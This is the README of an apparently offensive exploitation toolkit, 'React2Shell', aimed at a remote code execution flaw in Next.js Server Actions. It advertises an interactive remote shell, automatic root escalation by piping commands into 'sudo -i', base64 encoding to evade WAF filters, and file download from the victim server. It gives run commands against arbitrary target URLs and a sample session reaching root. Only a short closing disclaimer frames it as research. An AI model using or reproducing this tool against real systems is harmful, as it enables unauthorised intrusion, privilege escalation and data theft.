Advanced Exploitation Toolkit for Next.js Server Actions (CVE-2025-55182).
React2Shell is a powerful, interactive shell wrapper designed to exploit the React2Shell vulnerability. It goes beyond simple RCE by providing command history, file transfer capabilities, and automated privilege escalation strategies.
- Single-File Executable: Consolidates exploit logic and shell interface into one script. Zero external dependencies.
- Interactive Shell: Full pseudo-terminal experience with command history.
- Auto-Root Escalation: Built-in pipe injection strategy (
base64 | sudo -i) to bypass shell restrictions and escalate to root instantly. - File Operations:
.download <remote> [local]: Reliable binary-safe file download using base64 encoding..save: Save command output to local evidence files.
- Base64 Evasion: Automatically encodes payloads to bypass basic WAF filters and shell quoting issues.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requestspython3 react2shell.py -u https://target-nextjs-site.com/Run with verified root persistence strategy detection:
python3 react2shell.py -u https://target.com/Once inside the shell:
| Command | Description |
|---|---|
.root |
Toggle Root Mode (Wraps commands in sudo -i) |
.download <file> |
Download a file from the remote server |
.save |
Save the last command's output to a file |
.exit |
Exit the shell |
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)FOR EDUCATIONAL PURPOSES ONLY. This tool is intended for security research and authorization testing only. The authors are not responsible for any misuse or damage caused by this tool. Do not scan or exploit targets you do not have explicit permission to test.
Developed for ethical penetration testing and red teaming operations.